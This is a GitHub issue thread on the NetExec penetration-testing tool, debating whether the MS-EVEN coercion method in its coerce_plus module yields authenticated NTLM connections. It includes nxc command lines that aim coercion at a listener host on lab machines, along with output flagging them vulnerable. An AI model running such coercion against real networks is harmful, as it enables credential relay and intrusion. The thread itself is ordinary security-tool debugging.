NetExec icon indicating copy to clipboard operation
NetExec copied to clipboard

coerce_plus: MS-EVEN not working

Open rtpt-romankarwacik opened this issue 1 year ago • 5 comments

The MS-EVEN method used in coerce_plus is not working on the machines I tested (Win 10, Win 11), there are connections being triggered, but they are null sessions. When I looked at the PR, it looks like @NeffIsBack had the same results in the screenshot: https://github.com/Pennyw0rth/NetExec/pull/300#issuecomment-2395107662 Are there any cases where this attack actually uses credentials?

$ nxc smb -u user -p 'user' --local-auth -M coerce_plus -o LISTENER=192.168.56.111 METHOD=MSEven -- 192.168.56.113
SMB         192.168.56.113  445    WIN11VM          [*] Windows 11 Build 22621 x64 (name:WIN11VM) (domain:WIN11VM) (signing:False) (SMBv1:False)
SMB         192.168.56.113  445    WIN11VM          [+] WIN11VM\user:user (PRIVILEGED!)
COERCE_PLUS 192.168.56.113  445    WIN11VM          VULNERABLE, MSEven
$ nxc smb -u user -p 'user' --local-auth -M coerce_plus -o LISTENER=192.168.56.111 METHOD=MSEven -- 192.168.56.112
SMB         192.168.56.112  445    WIN10VM      [*] Windows 10 / Server 2019 Build 18362 x64 (name:WIN10VM) (domain:WIN10VM) (signing:False) (SMBv1:False)
SMB         192.168.56.112  445    WIN10VM      [+] WIN10VMREAL\user:user 
COERCE_PLUS 192.168.56.112  445    WIN10VM      VULNERABLE, MSEven

image

NetExec info

  • OS: debian
  • Version of nxc: https://github.com/Pennyw0rth/NetExec/commit/e19868ec
  • Installed from: github

EDIT: In the original POC ( https://github.com/evilashz/CheeseOunce ) the author says:

The MS-EVEN runing under the NT AUTHORITY\LOCAL SERVICE account, and this account can't provide valid credentials during network authentication so, in the NTLMRelay attacking, it can't work, like this (Sorry,I didn't test it fully, before push it):

Maybe it should be removed?

rtpt-romankarwacik avatar Dec 11 '24 14:12 rtpt-romankarwacik

Haven't figured it out yet, but first time i tested it it didn't work, second time i tested it it did work. Not sure what the problem was, but at least sometimes it works

NeffIsBack avatar Dec 11 '24 14:12 NeffIsBack

Haven't figured it out yet, but first time i tested it it didn't work, second time i tested it it did work. Not sure what the problem was, but at least sometimes it works

We had the same thought, but maybe it was just a false positive due to most of the time being used together with the other methods. In the reply you posted in the merge request, you said that it worked, and according to the screenshot no authentication data was sent. Additionally, the service runs network restricted, so I do not see how it could work at all. Or are there Windows Versions where the eventlog service is not running as network restricted?

rtpt-romankarwacik avatar Dec 12 '24 07:12 rtpt-romankarwacik

Looking at the wireshark traffic you might be right, there are no auth info send in the ntlm request. Maybe there is an edge case where the service isn't running in network restricted mode?

What is really weird to me is, that we still get an STATUS_SUCCESS back from the server when authenticating locally (only the DC though). That doesn't make sense to me.

NeffIsBack avatar Dec 12 '24 14:12 NeffIsBack

If you do not see the message “Exploit Success, eventlog\ElfrOpenBELW” when using the LISTENER parameter, NetExec coerce_plus.py - Line 923, it means the MSEven vulnerability has been fixed.

if host even/even6 RPC connection is available its indicator for MS-Even.

lodos2005 avatar Dec 17 '24 21:12 lodos2005

@lodos2005 Do you happen to have any Windows Version/Configuration where the RPC function resulted in an authenticated connection?

rtpt-romankarwacik avatar Jan 08 '25 11:01 rtpt-romankarwacik

I'm closing this, recently @Cross-thunter showed that MS-EVEN can be used in conjunction with a known malware to coerce Windows Defender and co. into connecting WITH authentication: https://github.com/Thunter-HackTeam/EvilentCoerce

I failed to replicate it on an up-to-date Windows 11, but on Windows 10 this worked flawlessly!

rtpt-romankarwacik avatar Jun 23 '25 13:06 rtpt-romankarwacik